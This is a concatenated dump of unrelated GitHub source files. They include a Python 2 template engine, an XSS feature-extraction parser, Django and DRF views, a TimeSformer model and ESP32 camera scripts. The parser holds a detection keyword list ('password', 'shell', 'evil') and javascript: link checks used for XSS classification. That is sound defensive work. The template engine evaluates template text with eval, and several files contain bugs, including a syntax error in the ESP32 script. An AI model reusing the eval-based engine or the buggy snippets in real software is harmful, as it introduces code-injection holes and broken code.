"noreply@github.com"
] | nitin-test.noreply@github.com |
326f5de126d44ed5c242cb25b5cef8c4788a9c97 | fffcc24d7c3fbadd615db1c2de632ebec72b92da | /cgi-bin/simpletemplate.py | 3551d703604abe395986350f77e0ad80b887ef96 | [] | no_license | kimihito/minpy | 35a5cf1596979e3bc57d6bfb6fcded03ae10f0d3 | 6273d43f65279d800a37a5dd9b34488d2cea54a1 | refs/heads/master | 2016-08-08T02:10:02.967527 | 2012-06-11T13:57:23 | 2012-06-11T13:57:23 | 4,147,292 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,517 | py | #!/usr/bin/env python
# coding: utf-8
import re
# Template-directive patterns recognized by SimpleTemplate.
if_pat=re.compile(r"\$if\s+(.*\:)")  # "$if <expr>:" -- captures "<expr>:" incl. the colon
endif_pat=re.compile(r"\$endif")  # closes an $if block
for_pat=re.compile(r"\$for\s+(.*)\s+in\s+(.*\:)")  # "$for <var> in <expr>:" -- two capture groups
endfor_pat=re.compile(r"\$endfor")  # closes a $for block
value_pat=re.compile(r"\${(.+?)}")  # "${<expr>}" inline value substitution (non-greedy)
class SimpleTemplate(object):
    """
    A template engine with a simple feature set ($if/$for/${...}).

    NOTE(review): this is Python 2 code (``unicode``, ``except X, e`` syntax,
    string exceptions) and evaluates template expressions with ``eval`` --
    never feed it untrusted templates or keyword values.
    """
    def __init__(self, body='', file_path=None):
        """
        Initializer: take the template text directly, or read it from
        ``file_path`` (UTF-8, decode errors ignored).
        """
        if file_path:
            # NOTE(review): the file handle is never closed.
            f=open(file_path)
            body=unicode(f.read(), 'utf-8', 'ignore')
        body=body.replace('\r\n', '\n')
        self.lines = body.split('\n')
        # Directive dispatch table: (pattern, handler) pairs, tried in order.
        self.sentences = ((if_pat, self.handle_if),
                          (for_pat, self.handle_for),
                          (value_pat, self.handle_value),)
    def render(self, kws={}):
        """
        Render the template, substituting the given keyword values.
        NOTE(review): mutable default argument ``kws={}``.
        """
        l, o=self.process(kws=kws)
        return o
    def find_matchline(self, pat, start_line=0):
        """
        Given a regex, return the index of the first matching line at or
        after ``start_line`` (-1 when no line matches).
        """
        cur_line=start_line
        for line in self.lines[start_line:]:
            if pat.search(line):
                return cur_line
            cur_line+=1
        return -1
    def process(self, exit_pats=(), start_line=0, kws={}):
        """
        Core rendering loop: walk lines from ``start_line``, dispatching
        directives to their handlers and copying plain lines through.
        Returns ``(next_line_index, rendered_output)``; stops (exclusive)
        at the first line matching any pattern in ``exit_pats``.
        """
        output=u''
        cur_line=start_line
        while len(self.lines) > cur_line:
            line=self.lines[cur_line]
            for exit_pat in exit_pats:
                if exit_pat.search(line):
                    return cur_line+1, output
            for pat, handler in self.sentences:
                m=pat.search(line)
                pattern_found=False
                if m:
                    try:
                        # Handlers may consume multiple lines and return the
                        # index of the last line they handled.
                        cur_line, out=handler(m, cur_line, kws)
                        pattern_found=True
                        output+=out
                        break
                    except Exception, e:
                        raise e #Exception("Following error occured in line %d\n%s" % (cur_line, str(e)))
            if not pattern_found:
                output+=line+'\n'
            cur_line+=1
        if exit_pats:
            # NOTE(review): string exception -- raises TypeError on Python 2.6+.
            raise "End of lines while parsing"
        return cur_line, output
    def handle_value(self, _match, _line_no, _kws={}):
        """
        Handle ${...} substitutions: eval each expression and splice the
        result into the line. Underscore-prefixed locals avoid clashing with
        names injected via locals().update(_kws).
        NOTE(review): mutating locals() to make _kws visible to eval is
        CPython-implementation-dependent -- confirm it works as intended.
        """
        _line=self.lines[_line_no]
        _rep=[]
        locals().update(_kws)
        pos=0
        while True:
            _m=value_pat.search(_line[pos:])
            if not _m:
                break
            pos+=_m.end()
            _rep.append( (_m.group(1), unicode(eval(_m.group(1)))) )
        for t, r in _rep:
            _line=_line.replace('${%s}'%t, r)
        return _line_no, _line+'\n'
    def handle_if(self, _match, _line_no, _kws={}):
        """
        Handle a $if block: render the body up to $endif, then discard it
        when the condition evaluates falsy. (There is no $else support: any
        "$else:" line is copied through verbatim.)
        """
        _cond=_match.group(1)
        if not _cond:
            # NOTE(review): 'line_no' is undefined here (should be _line_no),
            # so this error path itself raises NameError.
            raise "SyntaxError: invalid syntax in line %d" % line_no
        _cond=_cond[:-1]
        locals().update(_kws)
        _line, _out=self.process((endif_pat, ), _line_no+1, _kws)
        if not eval(_cond):
            _out=''
        return _line-1, _out
    def handle_for(self, _match, _line_no, _kws={}):
        """
        Handle a $for block: re-render the body once per element of the
        evaluated sequence, binding the loop variable through _kws.
        """
        _var=_match.group(1)
        _exp=_match.group(2)
        if not _var or not _exp:
            # NOTE(review): same undefined 'line_no' issue as in handle_if.
            raise "SyntaxError: invalid syntax in line %d" % line_no
        locals().update(_kws)
        _seq=eval(_exp[:-1])
        _out=''
        if not _seq:
            # Empty sequence: skip straight past the matching $endfor.
            return self.find_matchline(endfor_pat, _line_no), _out
        for _v in _seq:
            _kws.update({_var:_v})
            _line, _single_out=self.process((endfor_pat, ), _line_no+1, _kws)
            _out+=_single_out
        return _line-1, _out
def main():
    """Demo: render nested $if blocks and a $for loop to stdout (Python 2).

    NOTE(review): the "$else:" lines below are not implemented by the engine
    and are emitted verbatim; "<optioin" is a typo preserved from the demo.
    """
    t=SimpleTemplate("""aaaa
$if 1==1:
if clause0
$endif
$if 1==1:
if clause1
$if 1==1:
if clause1-2
$endif
$else:
else clause1
$endif
$if 1==1:
if clause2
$endif
$if 1==2:
if clause3
$else:
else clause3
$endif
bbbb
""")
    print t.render()
    print "-"*40
    t=SimpleTemplate("""
<select name="fruit">
$for val in ["Apple", "Banana", "Melon"]:
<optioin value="${val}">${val}</option>
$endfor
</select>
""")
    print t.render()
# Entry point; the triple-quoted string below is an inert pdb snippet kept
# for manual debugging.
if __name__=='__main__':
    """
    import pdb
    pdb.run('main()')
    """
    main()
| [
"tatsurotamashiro@gmail.com"
] | tatsurotamashiro@gmail.com |
7f329a56f3c63d6f634c341fe1ee1a609f562304 | eef39fd96ef4ed289c1567f56fde936d5bc42ea4 | /BaekJoon/Bronze2/15969.py | 803573cbb6d19798b9968fcd14d2be7454bafc32 | [] | no_license | dudwns9331/PythonStudy | 3e17da9417507da6a17744c72835c7c2febd4d2e | b99b9ef2453af405daadc6fbf585bb880d7652e1 | refs/heads/master | 2023-06-15T12:19:56.019844 | 2021-07-15T08:46:10 | 2021-07-15T08:46:10 | 324,196,430 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,452 | py | # 행복
"""
2021-01-22 오전 1:37
안영준
문제
코이 초등학교에 새로 부임하신 교장 선생님은 어린 학생들의 행복감과 학생들의 성적 차이 관계를 알아보기로 했다.
그래서 이전 성적을 조사하여 학생 들의 시험 점수 차이 변화를 알아보려고 한다.
예를 들어서 2016년 학생 8명의 점수가 다음과 같다고 하자.
27, 35, 92, 75, 42, 53, 29, 87
그러면 가장 높은 점수는 92점이고 가장 낮은 점수는 27점이므로 점수의 최대 차이는 65이다.
한편 2017년 학생 8명의 점수가 다음과 같았다.
85, 42, 79, 95, 37, 11, 72, 32
이때 가장 높은 점수는 95점이고 가장 낮은 점수는 11점이므로 점수의 최대 차이는 84이다.
N명 학생들의 점수가 주어졌을 때, 가장 높은 점수와 가장 낮은 점수의 차이를 구하는 프로그램을 작성하시오.
입력
표준 입력으로 다음 정보가 주어진다. 첫 번째 줄에는 학생 수 N이 주어진다. 다음 줄에는 N명의 학생 점수가 공백 하나를 사이에 두고 주어진다.
출력
표준 출력으로 가장 높은 점수와 가장 낮은 점수의 차이를 출력한다.
제한
모든 서브태스크에서 2 ≤ N ≤ 1,000이고 입력되는 학생들의 점수는 0 이상 1,000 이하의 정수이다.
"""
# BOJ 15969: print the difference between the highest and lowest score.
N = int(input())  # number of students; consumed but not otherwise needed
score = list(map(int, input().split()))
# max/min scan is O(n); the original sorted the whole list (O(n log n))
# just to read its two ends.
print(max(score) - min(score))
| [
"dudwns1045@naver.com"
] | dudwns1045@naver.com |
be53837e6f881208f6caffce7dcad68d8a4b39b7 | 37c6b326c3547c7ff89ade627d7d5a35a9d03025 | /Parser.py | 74c4d69c1b2da1b4cba092788d855321d1a8ed86 | [] | no_license | este6an13/XSSTrackerServers | e30836a203d6aecea0ac6f931aef09f91ce9096b | 191f67ee04ce853f129fd1e71d446e0c0709e4d6 | refs/heads/master | 2023-06-14T22:44:00.927187 | 2021-07-14T01:44:37 | 2021-07-14T01:44:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,789 | py | #import requests
#from bs4 import BeautifulSoup
# import re
from urllib.parse import urlparse
import esprima
class Parser():
    """Extract lexical features from a URL and its HTML/JavaScript content.

    ``url_*`` methods work on the raw URL string, ``html_*`` methods on the
    raw HTML string or a BeautifulSoup tree (``soup``), and ``js_*`` methods
    tokenize/parse inline <script> bodies with esprima. The numeric results
    are intended as input features for XSS detection.

    Fixed: the three js token counters previously triplicated the same loop
    (and computed an unused ``tokens.index(t)`` per token, an O(n^2) no-op);
    html_event_count duplicated html_attr_count; bare ``except:`` clauses
    narrowed to ``except Exception``.
    """
    # Suspicious words whose occurrences are summed by html_keywords().
    keywords = ['XSS', 'banking', 'redirect', 'root', 'password', 'crypt',
                'shell', 'spray', 'evil']
    def url_len(self, url):
        """Length of the raw URL string."""
        return len(url)
    def html_len(self, html):
        """Length of the raw HTML document."""
        return len(html)
    def url_spec_char(self, url):
        """1 if the URL contains any character from the special-char set."""
        return 1 if any(c in '[@_!#$%^*()<>\|}{~]' for c in url) else 0
    def url_tag(self, url, tag):
        """1 if the URL embeds <tag> or </tag>, plain or percent-encoded."""
        tags = ['<'+tag+'>', '</'+tag+'>', '%3C'+tag+'%3E', '%3C%2F'+tag+'%3E']
        return 1 if any(t in url for t in tags) else 0
    def url_substr(self, url, substr):
        """1 if ``substr`` occurs anywhere in the URL."""
        return 1 if substr in url else 0
    def url_params_count(self, url):
        """Number of '&'-separated parameters in the query string."""
        query = urlparse(url).query
        return 0 if query == '' else len(query.split('&'))
    def url_domain_count(self, url):
        """Number of dot-separated labels in the host name."""
        return len(urlparse(url).hostname.split('.'))
    def html_tag_count(self, soup, tag):
        """Number of ``tag`` elements in the parsed document."""
        return len(soup.find_all(tag))
    def html_attr_count(self, soup, attr):
        """Number of elements carrying attribute ``attr``."""
        return sum(1 for t in soup.find_all() if t.has_attr(attr))
    def html_event_count(self, soup, event):
        """Number of elements carrying event-handler attribute ``event``.

        Same computation as html_attr_count(); kept as a separate method
        for interface compatibility.
        """
        return self.html_attr_count(soup, event)
    def html_keywords(self, html):
        """Total occurrences of the suspicious ``keywords`` in the raw HTML."""
        return sum(html.count(k) for k in self.keywords)
    def js_file(self, soup):
        """1 if any <script> references an external *.js file via src."""
        for s in soup.find_all('script'):
            try:
                if s['src'].split('.')[-1] == 'js':
                    return 1
            except Exception:  # script tag without a src attribute
                pass
        return 0
    def pseudo_protocol(self, soup):
        """1 if any anchor uses the javascript: pseudo protocol."""
        for a in soup.find_all('a'):
            try:
                if a['href'].split(':')[0] == 'javascript':
                    return 1
            except Exception:  # anchor without an href attribute
                pass
        return 0
    def _js_token_count(self, soup, value):
        """Count tokens equal to ``value`` across all inline <script> bodies.

        Scripts that esprima cannot tokenize contribute nothing.
        """
        count = 0
        for s in soup.find_all('script'):
            try:
                for t in esprima.tokenize(str(s.string)):
                    if t.value == value:
                        count += 1
            except Exception:  # unparsable script body
                pass
        return count
    def js_prop_count(self, soup, prop):
        """Occurrences of property/identifier ``prop`` in inline scripts."""
        return self._js_token_count(soup, prop)
    def js_document_obj_count(self, soup):
        """Occurrences of the ``document`` object in inline scripts."""
        return self._js_token_count(soup, 'document')
    def js_method_count(self, soup, method):
        """Occurrences of method name ``method`` in inline scripts."""
        return self._js_token_count(soup, method)
    def js_min_len(self, soup):
        """Length of the shortest inline <script> body (0 when none exist).

        NOTE(review): an empty <script> has ``s.string is None``, which
        counts as len('None') == 4 here -- preserved for feature parity.
        """
        min_len = float('inf')
        for s in soup.find_all('script'):
            min_len = min(min_len, len(str(s.string)))
        return 0 if min_len == float('inf') else min_len
    def js_max_len(self, soup):
        """Length of the longest inline <script> body (0 when none exist)."""
        max_len = 0
        for s in soup.find_all('script'):
            max_len = max(max_len, len(str(s.string)))
        return max_len
    def _js_min_node_count(self, soup, node_type):
        """Minimum count of ``node_type`` AST nodes over all inline scripts.

        A script that fails to parse contributes the count for an empty
        tree, matching the original behaviour. Returns 0 with no scripts.
        """
        min_count = float('inf')
        for s in soup.find_all('script'):
            tree = {}
            try:
                tree = esprima.parseScript(str(s.string))
            except Exception:
                pass
            count = str(esprima.toDict(tree)).count(node_type)
            min_count = min(min_count, count)
        return 0 if min_count == float('inf') else min_count
    def js_min_function_call(self, soup):
        """Minimum number of function-call expressions per inline script."""
        return self._js_min_node_count(soup, 'CallExpression')
    def js_min_function_def(self, soup):
        """Minimum number of function declarations per inline script."""
        return self._js_min_node_count(soup, 'FunctionDeclaration')
| [
"diego.quintero@sitel.com"
] | diego.quintero@sitel.com |
d830da1f9d9e07fe504090cca4bc6f96ec19b136 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/response/SsdataDataserviceRiskAntifraudscoreQueryResponse.py | eb88453a0ac5e908d0040c632adda75bafe8c3cc | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 1,247 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class SsdataDataserviceRiskAntifraudscoreQueryResponse(AlipayResponse):
def __init__(self):
super(SsdataDataserviceRiskAntifraudscoreQueryResponse, self).__init__()
self._biz_no = None
self._score = None
self._unique_id = None
@property
def biz_no(self):
return self._biz_no
@biz_no.setter
def biz_no(self, value):
self._biz_no = value
@property
def score(self):
return self._score
@score.setter
def score(self, value):
self._score = value
@property
def unique_id(self):
return self._unique_id
@unique_id.setter
def unique_id(self, value):
self._unique_id = value
def parse_response_content(self, response_content):
response = super(SsdataDataserviceRiskAntifraudscoreQueryResponse, self).parse_response_content(response_content)
if 'biz_no' in response:
self.biz_no = response['biz_no']
if 'score' in response:
self.score = response['score']
if 'unique_id' in response:
self.unique_id = response['unique_id']
| [
"liuqun.lq@alibaba-inc.com"
] | liuqun.lq@alibaba-inc.com |
4688bc5cb098e3bd45c811d3ce8103e7115bcac9 | e9bb041494a13478ce8a1561e6f762d971938cf9 | /icsv/tests/writeReadTests.py | da371d69505b69730f40531fa2a0a68abca05727 | [
"MIT"
] | permissive | bponsler/icsv | f960e482a0506a87bd5a2d1ada6642065781cacd | 3f306bf1cf69c1cad87f051424fcb985cba65e96 | refs/heads/master | 2016-09-06T10:20:31.184798 | 2015-04-22T15:53:57 | 2015-04-22T15:53:57 | 12,776,696 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,580 | py | from os import unlink
from os.path import exists
from unittest import TestCase
from icsv import icsv, Row
class WriteReadTests(TestCase):
def setUp(self):
pass
def test_filter(self):
filename = "/tmp/testCsv.csv"
headers = ["one", "two", "three"]
csv = icsv(headers)
self.assertTrue(csv is not None)
self.assertEqual(csv.headers(), headers)
self.assertEqual(csv.delimiter(), ',')
rows = [
[0, 1, 2],
[3, 4, 5],
["hello", 1, True],
[1, False, "world"],
]
# Write all of the data to the file
for row in rows:
csv.addRow(row)
self.assertEqual(csv.numRows(), 4)
# Save the file
writer = csv.write(filename)
self.assertTrue(writer is not None)
# Read the same CSV
reader = csv.fromFile(filename, headers)
self.assertTrue(reader is not None)
# Compare the read data to the original
self.assertEqual(reader.numRows(), csv.numRows())
self.assertEqual(reader.numCols(), csv.numCols())
self.assertEqual(reader.headers(), csv.headers())
for index in range(len(rows)):
read = reader.getRow(index)
# Read data will be all strings
original = list(map(str, csv.getRow(index).list()))
expected = list(map(str, rows[index]))
for index in range(len(original)):
self.assertEqual(original[index], expected[index])
self.assertEqual(read.list(), expected)
| [
"ponsler@gmail.com"
] | ponsler@gmail.com |
8be84e7b162f60f07b18a5be2552aa8024cb5c75 | 336f751d1730e17b7fd4b645805988c3a30017d3 | /notes/serializers.py | b68bf8451fb92dc23bf5af3b730f313201e7cafc | [] | no_license | BasicPixel/marknote-live | 4a71905b341292630ca68b2988d82b17b389a5a9 | cb16ded8627859de23a62264d730c1a23af416ed | refs/heads/master | 2023-07-01T14:48:06.101120 | 2021-08-16T07:24:11 | 2021-08-16T07:24:11 | 396,673,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | from rest_framework import serializers
from .models import *
class NoteSerializer(serializers.ModelSerializer):
class Meta:
model = Note
fields = '__all__'
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = '__all__'
| [
"69857856+BasicPixel@users.noreply.github.com"
] | 69857856+BasicPixel@users.noreply.github.com |
02da9c8b6242405e3f94f40ba7c4cb887583b3d9 | c2097c731cdfc57c8901437b27dcb5791bcd20f0 | /for loop.py | e64dc37592e8a4984acf129d1c9fdc74fb27e66e | [] | no_license | louismatsika/python | bf66250587febc90e0cbed5bceeca2ba934d77e2 | d7c87b2cd884ee549b4383a552f64c64e3e4a2ad | refs/heads/master | 2020-04-07T00:08:09.185213 | 2018-11-16T16:41:11 | 2018-11-16T16:41:11 | 157,892,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 43 | py | for n in range (10):
print("loop",n)
| [
"noreply@github.com"
] | louismatsika.noreply@github.com |
7276838d2d32ee2a9bf909e88d930f4a84c9622f | 22e63f90d0ce8f03ac211b27735a1bac82b7401e | /mysite/blog/models.py | b065351bd518ea378bc615817607118a787661a3 | [] | no_license | binarever/Django | b4fc6673c5a5f06cfc4f903001b9b1886dc52961 | e86897f160c8e6085c27e78c493453dd246b9481 | refs/heads/master | 2020-12-02T17:40:33.626407 | 2017-07-06T08:47:39 | 2017-07-06T08:47:39 | 96,408,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 866 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
# Create your models here.
class Post(models.Model):
STATUS_CHOICES=(
('draft','Draft'),
('published','Published'),
)
title=models.CharField(max_length=250)
slug=models.SlugField(max_length=250,unique_for_date='publish')
author=models.ForeignKey(User,related_name='blog_posts')
body=models.TextField()
publish=models.DateTimeField(default=timezone.now)
created=models.DateTimeField(auto_now_add=True)
updated=models.DateTimeField(auto_now=True)
status=models.CharField(max_length=10,choices=STATUS_CHOICES,default='draft')
class meta:
ordering=('-publish',)
def __unicode__(self):
return self.title
| [
"2360566454@qq.com"
] | 2360566454@qq.com |
90ba45a70b9dff2d3a4a23b4d0c354dc2f9321ac | 3314fb1c0104b39af03126ff418385cd348040bc | /tests/test_default.py | cf610432e3aaf1efa440a42fa7fb500ba5a10612 | [] | no_license | viniciusfs/ansible-role-tomcat | 4b174408aaa0f479609b9a9a34a9f70d1caf5086 | dce442c095e3fd97246222835fa68bc474b2a42d | refs/heads/master | 2020-05-23T07:59:50.334435 | 2017-02-03T18:03:38 | 2017-02-03T18:03:38 | 80,482,410 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,045 | py | import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
'.molecule/ansible_inventory').get_hosts('all')
def test_tomcat_group(Group):
tomcat = Group('tomcat')
assert tomcat.exists
assert tomcat.gid == 215
def test_tomcat_user(User):
tomcat = User('tomcat')
assert tomcat.exists
assert tomcat.uid == 215
assert tomcat.group == 'tomcat'
assert tomcat.home == '/opt/tomcat'
def test_tomcat_directory(File):
tomcat_directory = File('/opt/apache-tomcat-7.0.75')
assert tomcat_directory.exists
assert tomcat_directory.is_directory
def test_tomcat_home(File):
tomcat_home = File('/opt/tomcat')
assert tomcat_home.exists
assert tomcat_home.is_symlink
assert tomcat_home.linked_to == '/opt/apache-tomcat-7.0.75'
def test_tomcat_started_enabled(Service):
tomcat = Service('tomcat')
assert tomcat.is_running
assert tomcat.is_enabled
def test_tomcat_port(Socket):
assert Socket("tcp://0.0.0.0:8080").is_listening
| [
"viniciusfs@gmail.com"
] | viniciusfs@gmail.com |
19e567714b4187da2231b288858d1595bd421c34 | b2e0aaa09ada3335d44860bd15d0e8fd8182d332 | /palindrome.py | 0f4820a097ceb43aded774a1a420c1c3dcd3dda6 | [] | no_license | udayraj333/python3 | 7bff91ef8b76a589c4f22bc3516322df3e0e6ef3 | d8b07a85a8697de8b79079bab36597669fa0954b | refs/heads/master | 2022-07-23T19:10:49.247880 | 2020-02-01T14:46:32 | 2020-02-01T14:46:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py |
num=(input("Enter a number:"))
temp=num
rev=0
while(num>0):
dig=num%10
rev=rev*10+dig
num=num//10
if(temp==rev):
print("The number is palindrome!")
else:
print("Not a palindrome!")
| [
"noreply@github.com"
] | udayraj333.noreply@github.com |
675dda5c8c83bf0f987ede0d78116c521d6932a4 | a6c0bb39fe1f5218094f9d8a728d32c7348414b8 | /timesformer_pytorch/timesformer_pytorch.py | dfbbfbb447de3d906549636f03dc5833d4f4c0ce | [
"MIT"
] | permissive | Willforcv/TimeSformer-pytorch | 042f23cd4e02e973fc0374579f18a4b529309edb | 4e4a60d4876a45cceddcf8af514eb39eac40ff96 | refs/heads/main | 2023-03-20T16:54:42.934377 | 2021-03-21T19:14:02 | 2021-03-21T19:14:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,494 | py | import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange, repeat
# classes
class RMSNorm(nn.Module):
def __init__(self, dim, eps = 1e-8):
super().__init__()
self.scale = dim ** -0.5
self.eps = eps
self.g = nn.Parameter(torch.ones(1))
def forward(self, x):
norm = torch.norm(x, dim = -1, keepdim = True) * self.scale
return x / norm.clamp(min = self.eps) * self.g
class PreNorm(nn.Module):
def __init__(self, dim, fn):
super().__init__()
self.fn = fn
self.norm = RMSNorm(dim)
def forward(self, x, *args, **kwargs):
x = self.norm(x)
return self.fn(x, *args, **kwargs)
# feedforward
class GEGLU(nn.Module):
def forward(self, x):
x, gates = x.chunk(2, dim = -1)
return x * F.gelu(gates)
class FeedForward(nn.Module):
def __init__(self, dim, mult = 4, dropout = 0.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, dim * mult * 2),
GEGLU(),
nn.Dropout(dropout),
nn.Linear(dim * mult, dim)
)
def forward(self, x):
return self.net(x)
# attention
def attn(q, k, v):
sim = einsum('b i d, b j d -> b i j', q, k)
attn = sim.softmax(dim = -1)
out = einsum('b i j, b j d -> b i d', attn, v)
return out
class Attention(nn.Module):
def __init__(
self,
dim,
dim_head = 64,
heads = 8,
dropout = 0.
):
super().__init__()
self.heads = heads
self.scale = dim_head ** -0.5
inner_dim = dim_head * heads
self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False)
self.to_out = nn.Sequential(
nn.Linear(inner_dim, dim),
nn.Dropout(dropout)
)
def forward(self, x, einops_from, einops_to, **einops_dims):
h = self.heads
q, k, v = self.to_qkv(x).chunk(3, dim = -1)
q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> (b h) n d', h = h), (q, k, v))
q *= self.scale
# splice out classification token at index 1
(cls_q, q_), (cls_k, k_), (cls_v, v_) = map(lambda t: (t[:, 0:1], t[:, 1:]), (q, k, v))
# let classification token attend to key / values of all patches across time and space
cls_out = attn(cls_q, k, v)
# rearrange across time or space
q_, k_, v_ = map(lambda t: rearrange(t, f'{einops_from} -> {einops_to}', **einops_dims), (q_, k_, v_))
# expand cls token keys and values across time or space and concat
r = q_.shape[0] // cls_k.shape[0]
cls_k, cls_v = map(lambda t: repeat(t, 'b () d -> (b r) () d', r = r), (cls_k, cls_v))
k_ = torch.cat((cls_k, k_), dim = 1)
v_ = torch.cat((cls_v, v_), dim = 1)
# attention
out = attn(q_, k_, v_)
# merge back time or space
out = rearrange(out, f'{einops_to} -> {einops_from}', **einops_dims)
# concat back the cls token
out = torch.cat((cls_out, out), dim = 1)
# merge back the heads
out = rearrange(out, '(b h) n d -> b n (h d)', h = h)
# combine heads out
return self.to_out(out)
# main classes
class TimeSformer(nn.Module):
def __init__(
self,
*,
dim,
num_frames,
num_classes,
image_size = 224,
patch_size = 16,
channels = 3,
depth = 12,
heads = 8,
dim_head = 64,
attn_dropout = 0.,
ff_dropout = 0.
):
super().__init__()
assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.'
num_patches = (image_size // patch_size) ** 2
num_positions = num_frames * num_patches
patch_dim = channels * patch_size ** 2
self.patch_size = patch_size
self.to_patch_embedding = nn.Linear(patch_dim, dim)
self.pos_emb = nn.Embedding(num_positions + 1, dim)
self.cls_token = nn.Parameter(torch.randn(1, dim))
self.layers = nn.ModuleList([])
for _ in range(depth):
self.layers.append(nn.ModuleList([
PreNorm(dim, Attention(dim, dim_head = dim_head, heads = heads, dropout = attn_dropout)),
PreNorm(dim, Attention(dim, dim_head = dim_head, heads = heads, dropout = attn_dropout)),
PreNorm(dim, FeedForward(dim, dropout = ff_dropout))
]))
self.to_out = nn.Sequential(
RMSNorm(dim),
nn.Linear(dim, num_classes)
)
def forward(self, video):
b, f, _, h, w, *_, device, p = *video.shape, video.device, self.patch_size
assert h % p == 0 and w % p == 0, f'height {h} and width {w} of video must be divisible by the patch size {p}'
n = (h // p) * (w // p)
video = rearrange(video, 'b f c (h p1) (w p2) -> b (f h w) (p1 p2 c)', p1 = p, p2 = p)
tokens = self.to_patch_embedding(video)
cls_token = repeat(self.cls_token, 'n d -> b n d', b = b)
x = torch.cat((cls_token, tokens), dim = 1)
x += self.pos_emb(torch.arange(x.shape[1], device = device))
for (time_attn, spatial_attn, ff) in self.layers:
x = time_attn(x, 'b (f n) d', '(b n) f d', n = n) + x
x = spatial_attn(x, 'b (f n) d', '(b f) n d', f = f) + x
x = ff(x) + x
cls_token = x[:, 0]
return self.to_out(cls_token)
| [
"lucidrains@gmail.com"
] | lucidrains@gmail.com |
a855cee959d104206a96609e4dc5641803ff210f | 622d20757e954d3af1b908d78182cf4ac033aa46 | /snippets/views.py | f92186751a7723a0ac5fd71c918b212a9397de1b | [] | no_license | bahatiphill/drf-pastebin | 7fd5e52423c93b73c6e323bdaae3fb515de5b914 | 57b58033cefcd515c0a292d23fe474a208bd45a3 | refs/heads/main | 2023-01-02T09:15:23.409128 | 2020-10-21T19:16:52 | 2020-10-21T19:16:52 | 306,122,979 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,699 | py | #from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework.parsers import JSONParser
from snippets.models import Snippet
from snippets.serializers import SnippetSerializer
# Create your views here.
@csrf_exempt
def snippet_list(request):
"""
List all code snippets, or create new snippet
"""
if request.method == 'GET':
snippets = Snippet.objects.all()
serializer = SnippetSerializer(snippets, many=True)
return JsonResponse(serializer.data, safe=False)
elif request.method == 'POST':
data = JSONParser().parse(request)
serializer = SnippetSerializer(data=data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data, status=201)
return JsonResponse(serializer.errors, status=400)
@csrf_exempt
def snippet_detail(request, pk):
"""
Retrieve, update or delete a code snippet
"""
try:
snippet = Snippet.objects.get(pk=pk)
except Snippet.DoesNotExist:
return HttpResponse(status=404)
if request.method == 'GET':
serializer = SnippetSerializer(snippet)
return JsonResponse(serializer.data)
elif request.method == 'PUT':
data = JsonResponse().parse(request)
serializer = SnippetSerializer(snippet, data=data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data)
return JsonResponse(serializer.errors, status=404)
elif request.method == 'DELETE':
snippet.delete()
return HttpResponse(status=204) | [
"philbert@digitalumuganda.com"
] | philbert@digitalumuganda.com |
d17f19505910625e866744c9a735f156ba740958 | 18a0ee9af4df1673dea4aa8e6afb007aea8aea56 | /Projects/ESP32Micropython/20-12-14/webserver/imagetofile.py | 6992825e4e2c61998a1bd46865d95a6a68d92691 | [
"MIT"
] | permissive | TizioMaurizio/ArduinoWorkshop | f328fde497453919811b3621c2bffaae948ac61a | a614936f3ff8d221086eacf428f70d4502e833d7 | refs/heads/master | 2023-08-08T20:42:19.476233 | 2023-07-23T00:19:56 | 2023-07-23T00:19:56 | 209,500,938 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,222 | py | import camera
import os
import utime
import machine
def capture():
os.chdir('webserver')
f = open('data.jpg', 'w')
camera.init(1)
buf = camera.capture()
f.write(buf)
f.close()
f = open('data2.jpg', 'w')
buf = camera.capture()
f.write(buf)
camera.deinit()
f.close()
def capture3():
os.chdir('webserver')
f = open('data.jpg', 'w')
camera.init(1)
buf = camera.capture()
f.write(buf)
f = open('data'+str(1)'+.jpg', 'w')
buf = camera.capture()
f.write(buf)
camera.deinit()
f.close()
def capture4():
os.chdir('webserver')
camera.init(1)
for i in range(100):
f = open('frame'+str(i)+'.jpg', 'w')
buf = camera.capture()
f.write(buf)
camera.deinit()
f.close()
def capture2s():
os.chdir('webserver')
camera.init(1)
begin = utime.ticks_ms()
time = begin
prev = time
i=0
machine.sleep(500)
#while(time - begin < 2000):
#if(time - prev > -1):
prev = time
i=i+1
name = 'frame'+str(i)+'.jpg'
print(name)
f = open(name, 'w')
buf = camera.capture()
f.write(buf)
f.close()
#time = utime.ticks_ms()
camera.deinit()
| [
